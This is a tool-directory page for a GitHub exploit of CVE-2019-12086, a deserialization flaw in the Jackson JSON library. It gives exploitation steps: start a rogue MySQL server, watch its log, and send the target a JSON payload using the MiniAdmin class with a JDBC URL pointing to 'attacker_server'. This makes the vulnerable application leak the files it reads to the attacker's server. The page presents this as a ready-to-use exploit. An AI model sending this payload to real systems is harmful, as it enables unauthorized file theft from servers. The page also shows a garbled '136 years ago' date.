Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-12086 — jackson unserialize | Kitploit
Tools/GitHubGitHub/al1ex/cve-2019-12086
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationDatabase Security
GitHubal1ex/cve-2019-12086

CVE-2019-12086

jackson unserialize

View Repository
136 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Documentation

CVE-2019-12086 jackson unserialize

Vulnerability Exploitation

  1. Start a malicious MySQL server:

python rogue_mysql_server.py

  1. Check mysql.log in the same directory:

tail -f mysql.log

  1. Send the following JSON to the vulnerable application:

["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]

When Jackson deserializes the malicious JSON string, it will connect to the malicious MySQL server, and the contents of the read file will be written to the malicious server's mysql.log.

Download Tool